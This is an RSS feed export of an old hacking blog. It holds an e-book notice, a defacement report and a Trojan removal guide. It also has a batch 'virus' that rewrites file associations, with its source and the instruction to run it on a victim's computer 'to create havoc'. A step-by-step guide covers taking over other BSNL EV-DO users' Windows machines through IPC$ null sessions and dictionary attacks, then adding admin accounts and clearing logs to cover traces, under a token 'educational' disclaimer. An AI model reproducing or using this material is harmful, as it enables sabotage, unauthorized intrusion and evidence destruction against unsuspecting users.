<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Technocrawl</title>
	<atom:link href="http://technocrawl.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://technocrawl.wordpress.com</link>
	<description>A place where Geeks meet</description>
	<lastBuildDate>Sun, 29 May 2011 13:14:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='technocrawl.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Technocrawl</title>
		<link>http://technocrawl.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://technocrawl.wordpress.com/osd.xml" title="Technocrawl" />
	<atom:link rel='hub' href='http://technocrawl.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Batch File Programming E-Book Released Online</title>
		<link>http://technocrawl.wordpress.com/2009/05/17/batch-file-programming-e-book-released-online/</link>
		<comments>http://technocrawl.wordpress.com/2009/05/17/batch-file-programming-e-book-released-online/#comments</comments>
		<pubDate>Sun, 17 May 2009 17:45:30 +0000</pubDate>
		<dc:creator>technocrawl</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[batch file programming by Cybercrawler]]></category>
		<category><![CDATA[batch file programming by Premkumar]]></category>
		<category><![CDATA[Batch file programming E-Book]]></category>
		<category><![CDATA[batch virus]]></category>
		<category><![CDATA[dark-coderz]]></category>
		<category><![CDATA[technocrawl]]></category>
		<category><![CDATA[w3cert]]></category>

		<guid isPermaLink="false">http://technocrawl.wordpress.com/?p=470</guid>
		<description><![CDATA[I am very happy to inform that the E-book on ‘Batch File Programming‘ authored by me is published on the Internet today. More over i have found 16 Reads and 26 Downloads with in 12 Minutes from the time of uploading in the popular Document uploading site www.scribd.com.     If you want to read [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=470&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I am very happy to inform that the E-book on ‘<strong><span style="color:#0000ff;"><em>Batch File Programming</em></span></strong>‘ authored by me is published on the Internet today. More over i have found 16 Reads and 26 Downloads with in 12 Minutes from the time of uploading in the popular Document uploading site www.scribd.com.</p>
<p> </p>
<p style="text-align:center;"><img class="aligncenter" title="Batch File Programming" src="http://i402.photobucket.com/albums/pp101/cybercrawler/BookCover.jpg" alt="Batch File Programming" width="282" height="352" /></p>
<p> </p>
<p>If you want to read the book online, you can check with this Link </p>
<p><object id="doc_590220978376573" name="doc_590220978376573" height="600" width="595" type="application/x-shockwave-flash" data="http://d1.scribdassets.com/ScribdViewer.swf" style="outline:none;"><param name="movie" value="http://d1.scribdassets.com/ScribdViewer.swf"><param name="wmode" value="opaque"><param name="bgcolor" value="#ffffff"><param name="allowFullScreen" value="true"><param name="allowScriptAccess" value="always"><param name="FlashVars" value="document_id=15565801&#038;access_key=key-2asbigpba6d5kdlmdbhd&#038;page=1&#038;viewMode=list"><embed id="doc_590220978376573" name="doc_590220978376573" src="http://d1.scribdassets.com/ScribdViewer.swf?document_id=15565801&#038;access_key=key-2asbigpba6d5kdlmdbhd&#038;page=1&#038;viewMode=list" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="600" width="595" wmode="opaque" bgcolor="#ffffff"></embed></object></p>
<p>You may also download and enjoy reading the book from the above given link.</p>
<p> </p>
<p style="text-align:center;"><a href="http://www.scribd.com/doc/15565801/Batch-File-Programming"></a></p>
<p style="text-align:center;"><a href="http://www.scribd.com/doc/15565801/Batch-File-Programming"></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/technocrawl.wordpress.com/470/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/technocrawl.wordpress.com/470/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/technocrawl.wordpress.com/470/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/technocrawl.wordpress.com/470/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/technocrawl.wordpress.com/470/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/technocrawl.wordpress.com/470/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/technocrawl.wordpress.com/470/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/technocrawl.wordpress.com/470/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=470&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://technocrawl.wordpress.com/2009/05/17/batch-file-programming-e-book-released-online/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">technocrawl</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/BookCover.jpg" medium="image">
			<media:title type="html">Batch File Programming</media:title>
		</media:content>
	</item>
		<item>
		<title>Internet Thermometer Defaced again.</title>
		<link>http://technocrawl.wordpress.com/2009/02/11/internet-thermometer-defaced-again/</link>
		<comments>http://technocrawl.wordpress.com/2009/02/11/internet-thermometer-defaced-again/#comments</comments>
		<pubDate>Wed, 11 Feb 2009 07:07:52 +0000</pubDate>
		<dc:creator>technocrawl</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[arabian hackerd]]></category>
		<category><![CDATA[archive]]></category>
		<category><![CDATA[defaced]]></category>
		<category><![CDATA[defaced mirror]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[mirror]]></category>
		<category><![CDATA[zone-h hacked]]></category>

		<guid isPermaLink="false">http://technocrawl.wordpress.com/?p=468</guid>
		<description><![CDATA[www.Zone-H.org &#8211; considered as the Internet thermometer, that contains mirrors and archives of the defaced sites all around the world was hacked today  at 11:43 am GMT wednessday Feb 11-2009. It seems like it was defaced by arabian hackers. they have placed a viddeo content linked with youtube that plays the baby dance and was [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=468&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>www.Zone-H.org &#8211; considered as the Internet thermometer, that contains mirrors and archives of the defaced sites all around the world was hacked today  at 11:43 am GMT wednessday Feb 11-2009.</p>
<p>It seems like it was defaced by arabian hackers. they have placed a viddeo content linked with youtube that plays the baby dance and was mentioned that they were bored, so the hackd the site to make fun.</p>
<p>Here i have enclosed the the snapshot how the defaced site (zone-h.org) looked like,</p>
<p><img src="http://i402.photobucket.com/albums/pp101/cybercrawler/zone-h1146amGMTwed.png" alt="defacement mirro" width="462" height="490" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/technocrawl.wordpress.com/468/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/technocrawl.wordpress.com/468/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/technocrawl.wordpress.com/468/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/technocrawl.wordpress.com/468/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/technocrawl.wordpress.com/468/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/technocrawl.wordpress.com/468/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/technocrawl.wordpress.com/468/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/technocrawl.wordpress.com/468/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=468&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://technocrawl.wordpress.com/2009/02/11/internet-thermometer-defaced-again/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">technocrawl</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/zone-h1146amGMTwed.png" medium="image">
			<media:title type="html">defacement mirro</media:title>
		</media:content>
	</item>
		<item>
		<title>How to Remove &#8216;Yannh.cmd Trojan&#8217;</title>
		<link>http://technocrawl.wordpress.com/2008/12/28/how-to-remove-yannhcmd-trojan/</link>
		<comments>http://technocrawl.wordpress.com/2008/12/28/how-to-remove-yannhcmd-trojan/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 07:03:02 +0000</pubDate>
		<dc:creator>technocrawl</dc:creator>
				<category><![CDATA[Malwares]]></category>
		<category><![CDATA[cmd virus]]></category>
		<category><![CDATA[deleting yannh.cmd]]></category>
		<category><![CDATA[How to Remove Yannh.cmd Trojan]]></category>
		<category><![CDATA[removing yannh]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Yannh.cmd]]></category>
		<category><![CDATA[Yannh.cmd Trojan]]></category>

		<guid isPermaLink="false">http://technocrawl.wordpress.com/?p=464</guid>
		<description><![CDATA[&#8220;yannh.cmd&#8221; is a Trojan that often spreads from external storage medias like USB, CD, DVD widely by injecting into the autorun.inf file. When i explored my autorun.inf, i found the few autorun entries made by &#8220;Yannh.cmd&#8221; like this, open=yannh.cmd shell\open\Command=yannh.cmd shell\explore\Command=yannh.cmd You can&#8217;t directly edit the autorun.inf file while it is currently running, another thing [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=464&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div class="wp-caption aligncenter" style="width: 392px"><img title="Tr0jan" src="http://i402.photobucket.com/albums/pp101/cybercrawler/Virus.png" alt="TR0JAN" width="382" height="295" /><p class="wp-caption-text">Tr0jan</p></div>
<p>&#8220;<strong>yannh.cmd</strong>&#8221; is a Trojan that often spreads from external storage medias like USB, CD, DVD widely</p>
<p>by injecting into the autorun.inf file.</p>
<p>When i explored my autorun.inf, i found the few autorun entries made by &#8220;Yannh.cmd&#8221; like this,</p>
<p><span style="color:#00ffff;">open=yannh.cmd<br />
shell\open\Command=yannh.cmd<br />
shell\explore\Command=yannh.cmd</span></p>
<p>You can&#8217;t directly edit the autorun.inf file while it is currently running, another thing you have to notice is, this file attribute is set to read only mode, hence you have to revoke it first to proceed further.</p>
<p>How can i Identify whether my computer got infected ?</p>
<p>open up your command prompt and type</p>
<p><span style="color:#3366ff;">cd\<br />
dir /a</span></p>
<p style="text-align:center;"><img class="aligncenter" title="yannh.cmd" src="http://i402.photobucket.com/albums/pp101/cybercrawler/yannhcmd.png" alt="yannh.cmd" width="416" height="122" /></p>
<p style="text-align:left;">dir /a &#8211; will clearly display all the hidden files in the drives.</p>
<p style="text-align:left;">This &#8220;Yannh.cmd&#8221; makes some registry entries in the following path&#8230;<br />
<span style="color:#3366ff;">HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft</span><br />
and has its source file in the system32 directory with the name Kamsoft.</p>
<p>Here are the ways that helps you get rid of this Trojan.</p>
<p><strong><span style="color:#0000ff;">Step 1:</span></strong></p>
<p>Its is always recommended to back-up your registry before touching it, after a successful backup,<br />
goto the below path</p>
<p><span style="color:#3366ff;">HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft</span><br />
and delete Kamsoft.</p>
<p><span style="color:#0000ff;"><strong>Step 2:</strong></span></p>
<p>Open up the command prompt and type the following</p>
<p><span style="color:#3366ff;">cd\<br />
attrib -r -s -h yannh.cmd<br />
del yannh.cmd</span></p>
<p>This will delete the yannh.cmd file.</p>
<p><span style="color:#0000ff;"><strong>Step 3:</strong></span></p>
<p>Now you have to delete the kamsoft folder from your system32 directory, just type the below commands in the command prompt.</p>
<p><span style="color:#3366ff;">cd\<br />
cd C:\WINDOWS\system32<br />
attrib -r -s -h kamsoft.exe<br />
del kamsoft.exe<br />
</span></p>
<p><span style="color:#0000ff;"><strong>Step 4:</strong></span></p>
<p>Now you can edit the autorun.inf file to remove the entried added by yannh.cmd</p>
<p style="text-align:left;"><span style="color:#3366ff;">cd\<br />
attrib -r -h -s autorun.inf<br />
edit attrib.inf<br />
</span><br />
Now delete where ever it says yannh.cmd and save changes.<br />
Now you are done with it.</p>
<p style="text-align:left;">Here are the similar files that you must be aware of,</p>
<p>refsanvn.inf<br />
Zidan vs Tito.exe<br />
desktop.exe<br />
omsirutnarg.exe<br />
Alisa.exe<br />
blazzers.exe<br />
burimi.exe<br />
nfd.exe<br />
repppp.exe<br />
wax.exe<br />
wny.exe<br />
msv2008.exe<br />
GETBOOTD.BAT<br />
tbm9.bat<br />
08dgu.com<br />
1t6yxlxx.cmd<br />
2h60k.cmd<br />
3rl3lqbq.bat<br />
ewatr.cmd<br />
Maradona.exe<br />
iw.bat<br />
m2nl.bat<br />
ov.cmd<br />
pnt.com<br />
t1ypkh.exe<br />
grgarevn.inf<br />
microsvn.inf<br />
Installer.exe<br />
fvbk.exe<br />
snaoc9i.exe<br />
bt8vuaw.com<br />
wjlc.exe<br />
6fnlpetp.exe<br />
g8rruyw.exe<br />
o1.com<br />
Secret.exe<br />
hupxj.bat<br />
fphj6j31.bat<br />
shell.exe</p>
<p style="text-align:left;">
<p style="text-align:left;">
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/technocrawl.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/technocrawl.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/technocrawl.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/technocrawl.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/technocrawl.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/technocrawl.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/technocrawl.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/technocrawl.wordpress.com/464/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=464&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://technocrawl.wordpress.com/2008/12/28/how-to-remove-yannhcmd-trojan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">technocrawl</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/Virus.png" medium="image">
			<media:title type="html">Tr0jan</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/yannhcmd.png" medium="image">
			<media:title type="html">yannh.cmd</media:title>
		</media:content>
	</item>
		<item>
		<title>Ext_change Virus</title>
		<link>http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/</link>
		<comments>http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 08:16:41 +0000</pubDate>
		<dc:creator>technocrawl</dc:creator>
				<category><![CDATA[Batch programming]]></category>
		<category><![CDATA[batch virus]]></category>
		<category><![CDATA[extension changer]]></category>
		<category><![CDATA[Ext_change virus]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[virus program]]></category>
		<category><![CDATA[virus source code]]></category>

		<guid isPermaLink="false">http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/</guid>
		<description><![CDATA[Here I Have enclosed a simple Extension replaceable batch virus &#8220;Ext_change&#8221; Source code. 1. Open up a Notepad and copy and paste the below code. Title Ext_Change Virus color a Rem This Virus file replaces the actual file extensions with the given extensions @echo off assoc .txt=jpegfile assoc .exe=htmlfile assoc .jpeg=avifile assoc .png=mpegfile assoc .mpeg=txtfile [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=462&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Here I Have enclosed a simple Extension replaceable batch virus &#8220;Ext_change&#8221; Source code.</p>
<p>1. Open up a Notepad and copy and paste the below code.</p>
<p>Title Ext_Change Virus<br />
color a<br />
Rem  This Virus file replaces the actual file extensions with the given extensions<br />
@echo off<br />
assoc .txt=jpegfile<br />
assoc .exe=htmlfile<br />
assoc .jpeg=avifile<br />
assoc .png=mpegfile<br />
assoc .mpeg=txtfile<br />
assoc .sys=regfile<br />
msg Your System got Infected&#8230;..<br />
exit</p>
<p>2. Save it with the extension .bat, and now you are ready to go&#8230;.<br />
3. Execute this on Victims computer to create havoc.</p>
<p>Its only you who is responsible for what you do with this&#8230;. we are not responsible for whatever you do with this&#8230; and it is only meant for educational means&#8230;</p>
<p>How it Works&#8230;.</p>
<p>This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it&#8230;<br />
It replaces all the text files [.txt] with the extension [.jpeg], and likewise&#8230;.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/technocrawl.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/technocrawl.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/technocrawl.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/technocrawl.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/technocrawl.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/technocrawl.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/technocrawl.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/technocrawl.wordpress.com/462/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=462&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">technocrawl</media:title>
		</media:content>
	</item>
		<item>
		<title>Rooting Machines that are using BSNL EV-DO</title>
		<link>http://technocrawl.wordpress.com/2008/12/02/rooting-machines-that-are-using-bsnl-ev-do/</link>
		<comments>http://technocrawl.wordpress.com/2008/12/02/rooting-machines-that-are-using-bsnl-ev-do/#comments</comments>
		<pubDate>Tue, 02 Dec 2008 17:07:12 +0000</pubDate>
		<dc:creator>technocrawl</dc:creator>
				<category><![CDATA[General Hacking Discussion]]></category>
		<category><![CDATA[3G Technology hack]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[BSNL EVDO]]></category>
		<category><![CDATA[Hacking BSNL]]></category>
		<category><![CDATA[Hacking BSNL USB Modem]]></category>
		<category><![CDATA[Hacking EVDO]]></category>
		<category><![CDATA[Hacking ISP]]></category>
		<category><![CDATA[Hacking USB Modem]]></category>
		<category><![CDATA[IPC share hacking]]></category>
		<category><![CDATA[net use]]></category>
		<category><![CDATA[net view]]></category>
		<category><![CDATA[Zombie]]></category>
		<category><![CDATA[ZTE EVDO]]></category>

		<guid isPermaLink="false">http://technocrawl.wordpress.com/?p=457</guid>
		<description><![CDATA[BSNL is a Government body that offers Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning. This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL. EVDO is a Technology short for “Evolution &#8211; Data only” that uses 3G Technology introduced [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=457&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><img class="alignleft" title="BSNL EV-DO" src="http://i402.photobucket.com/albums/pp101/cybercrawler/BSNLEVDO-1.jpg" alt="BSNL Modem" width="155" height="197" /> BSNL is a Government body that <a id="AdBriteInlineAd_offers" name="AdBriteInlineAd_offers" target="_top">offers</a> Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning.</p>
<p style="text-align:center;">This hack <a id="AdBriteInlineAd_works" name="AdBriteInlineAd_works" target="_top">works</a> on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL.</p>
<p style="text-align:center;">EVDO is a Technology short for “<strong>Evolution &#8211; Data only</strong>” that uses 3G Technology introduced by Qualcomm.</p>
<p style="text-align:center;">Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.<br />
This hack works only with Windows based Boxes.</p>
<p><strong><span style="color:#00ffff;">Step 1 :</span></strong><br />
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet.</p>
<p><span style="color:#00ffff;"><strong>Step 2 :</strong></span><br />
While the modem is connected to the internet, open up a command prompt and type “<strong>Net View</strong>”<br />
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not.</p>
<p>Here is list of hostnames that was available when i was dealing with this, let it be a POC.</p>
<p style="text-align:center;"><img class="aligncenter" src="http://i402.photobucket.com/albums/pp101/cybercrawler/BSNL.jpg" alt="BSNL Hostnames" /></p>
<p style="text-align:left;">
<p style="text-align:left;"><span style="color:#00ffff;"><strong>Step 3:</strong></span><br />
Now the major part is to find a host that is alive, and this can be done both manually and<br />
also by using automated Batch program, once you got the host that is alive, you can connect to<br />
its hidden IPC$ ( Inter Process Connect ) share by using the below command,</p>
<p style="text-align:center;"><span style="color:#00ffff;"><strong>Net use \\IP-Address\IPC$ “”</strong></span></p>
<p>in my case i used the following…..</p>
<p style="text-align:center;"><img class="aligncenter" src="http://i402.photobucket.com/albums/pp101/cybercrawler/connected.jpg" alt="Connected" /></p>
<p style="text-align:left;">So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further…<br />
<span style="color:#00ffff;"><strong><br />
Step 4:</strong></span><br />
Now to check whether there is connection between your computer and the target, just type the below command, net use</p>
<p>This will reveal the current connections…..</p>
<p><span style="color:#00ffff;"><strong>Step 5:</strong></span></p>
<p style="text-align:left;">In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.<br />
You can compromise admin account by using Dictionary attack, and you can use the “LAN Remote<br />
user &#8211; Dictionary Attack” tool which is already published in the site, else you can <a href="http://dark-coderz.net/?p=109"><strong>click here</strong></a> to check that out.</p>
<p>Check with the syntax properly before starting…..</p>
<p><span style="color:#00ffff;"><strong>Step 6:</strong></span><br />
Once you obtained the password of the administrator account, you can use the same net command<br />
to establish a connection with administrator rights….</p>
<p style="text-align:center;"><span style="color:#00ffff;"><strong>Net use \\IP-Address\sharename “password” /user:administrator</strong></span></p>
<p style="text-align:left;">once you got the message “Command Completed Successfully” then you are connected to the target<br />
machine with admin access.</p>
<p><span style="color:#00ffff;"><strong>Step 7:</strong></span><br />
Now goto run and type “compmgmt.msc”, this will take you to the Computer management, Click on<br />
Action -&gt; Connect to another computer…. and then type in the IP address or the Hostname of<br />
the target machine.</p>
<p>Once you got access to the remote host, now you can see the computer management(Local) changes<br />
to the Computer Management(XXX.XXX.XXX.XXX) &#8211; Remote IP.</p>
<p><span style="color:#00ffff;"><strong>Step 8:</strong></span><br />
You can now create a New user account on the remote machine by expanding the Local users and<br />
Groups -&gt; users -&gt; right click there and create a new user and assign Admin rights.</p>
<p><span style="color:#00ffff;"><strong>Step 9:</strong></span><br />
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter.</p>
<p><span style="color:#00ffff;"><strong>Step 10:</strong></span><br />
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter.</p>
<p><span style="color:#00ffff;"><strong>Step 11: </strong></span><br />
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command</p>
<p><span style="color:#00ffff;"><strong>Net use \\IP-Address\IPC$ /delete </strong></span></p>
<p>This is a high Potential Security threat… because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on.</p>
<p><span style="color:#00ffff;"><strong>Step 12: </strong></span><br />
To avoid being a victim to such kind of attacks, you can read the documentation submitted in dark-coderz by <a href="http://dark-coderz.net/?p=82">Clicking here</a>.</p>
<p><strong><span style="color:#ff0000;">Disclaimer :- </span></strong><br />
This is only meant for Educational purpose, dark-coderz and its TEAM takes No Responsibilty for any illegal activity.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/technocrawl.wordpress.com/457/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/technocrawl.wordpress.com/457/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/technocrawl.wordpress.com/457/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/technocrawl.wordpress.com/457/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/technocrawl.wordpress.com/457/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/technocrawl.wordpress.com/457/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/technocrawl.wordpress.com/457/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/technocrawl.wordpress.com/457/" /></a> <img alt="" border="0" 